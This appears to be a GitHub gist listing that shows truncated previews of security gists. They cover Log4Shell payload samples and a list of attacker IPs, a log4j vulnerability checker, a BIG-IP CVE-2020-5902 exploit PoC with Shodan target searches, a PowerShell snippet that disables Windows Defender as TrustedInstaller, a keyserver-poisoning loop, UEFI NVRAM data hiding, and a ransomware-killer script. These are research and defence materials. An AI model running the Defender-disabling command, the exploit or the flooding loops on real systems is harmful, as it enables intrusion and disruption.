Vesselin Bontchev bontchev
@nathanqthai
nathanqthai / payload_samples.md
Last active Dec 23, 2021
Sample Log4Shell (CVE-2021-44228) payloads observed in the wild by GreyNoise Intelligence

Samples

Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise has observed.

These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.

Examples

The following section includes Log4Shell samples seen in the wild.

URL Encoding and Failed argv Input (????)

What appears to be a failed attempt:

@gnremy
gnremy / CVE-2021-44228_IPs.csv
Last active Jan 9, 2022
CVE-2021-44228 Apache Log4j RCE Attempts Dec 20th 9:27PM ET
ip tag_name
162.155.56.106 Apache Log4j RCE Attempt
223.111.180.119 Apache Log4j RCE Attempt
213.142.150.93 Apache Log4j RCE Attempt
211.154.194.21 Apache Log4j RCE Attempt
210.6.176.90 Apache Log4j RCE Attempt
199.244.51.112 Apache Log4j RCE Attempt
199.101.171.39 Apache Log4j RCE Attempt
197.246.175.186 Apache Log4j RCE Attempt
196.196.150.38 Apache Log4j RCE Attempt
@byt3bl33d3r
byt3bl33d3r / log4j_rce_check.py
Created Dec 10, 2021
Python script to detect if an HTTP server is potentially vulnerable to the log4j 0day RCE (https://www.lunasec.io/docs/blog/log4j-zero-day/)
#! /usr/bin/env python3
'''
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021.
@geek-at
geek-at / trash.sh
Created Aug 13, 2020
The script used to trash a banking phishing site
#!/bin/bash
while :; do
verf=$(cat /dev/urandom | tr -dc '0-9' | fold -w 8 | head -n 1)
pin=$(cat /dev/urandom | tr -dc '0-9' | fold -w 5 | head -n 1)
ip=$(printf "%d.%d.%d.%d\n" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))" "$((RANDOM % 256))")
@cihanmehmet
cihanmehmet / CVE-2020-5902.md
Last active Dec 22, 2021
BIGIP CVE-2020-5902 Exploit POC

🚨BIGIP CVE-2020-5902 Exploit POC 🔥🧱🔨👀


Shodan Search

title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"

🔸LFI

@tyranid
tyranid / doh.ps1
Created May 4, 2020
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
@jthuraisamy
jthuraisamy / _README.md
Last active Dec 28, 2021
GospelRoom: Data Storage in UEFI NVRAM Variables

GospelRoom: Data Storage in UEFI NVRAM Variables

Behaviour

Persist data in UEFI NVRAM variables.

Benefits

  1. Stealthy way to store secrets and other data in UEFI.
  2. Will survive a reimaging of the operating system.
View Kill-Ransomware.ps1
# Ransomware Killer v0.1 by Thomas Patzke <thomas@patzke.org>
# Kill all parent processes of the command that tries to run "vssadmin Delete Shadows"
# IMPORTANT: This must run with Administrator privileges!
Register-WmiEvent -Query "select * from __instancecreationevent within 0.1 where targetinstance isa 'win32_process' and targetinstance.CommandLine like '%vssadmin%Delete%Shadows%'" -Action {
# Kill all parent processes from detected vssadmin process
$p = $EventArgs.NewEvent.TargetInstance
while ($p) {
$ppid = $p.ParentProcessID
$pp = Get-WmiObject -Class Win32_Process -Filter "ProcessID=$ppid"
Write-Host $p.ProcessID
@alpakido
alpakido / fill_the_pool.sh
Last active Dec 13, 2020
Redacted SKS exploit that was sent to me by attacker behind https://news.ycombinator.com/item?id=20312826
for _ in {1..500}; do
for _ in {1..100}; do
gpg --gen-key --batch keygen
gpg --quick-sign-key -u Marc EC18257DB21746FC711054BEB19C61D61333360C
rm ~/.gnupg/private-keys-v1.d/*.key
done
rm ~/.gnupg/openpgp-revocs.d/*.rev
gpg -a --export > ~/Desktop/keyblock.asc
@AveYo
AveYo / .. MediaCreationTool.bat ..md
Last active Jan 21, 2022
Universal MediaCreationTool wrapper for all MCT Windows 10 versions from 1507 to 21H1 with business (Enterprise) edition support

We did it! We broke gist.github.com ;) So head over to the new home! Thank you all!
2021.10.20: https://github.com/AveYo/MediaCreationTool.bat now open for interaction

  • new update introducing no 11 setup checks on boot in VirtualBox

Not just a Universal MediaCreationTool wrapper script with ingenious support for business editions,
A powerful yet simple windows 10 / 11 deployment automation tool as well!

configure via set vars, commandline parameters or rename script like iso 21H2 Pro MediaCreationTool.bat
recommended windows setup options with the least amount of issues on upgrades set via auto.cmd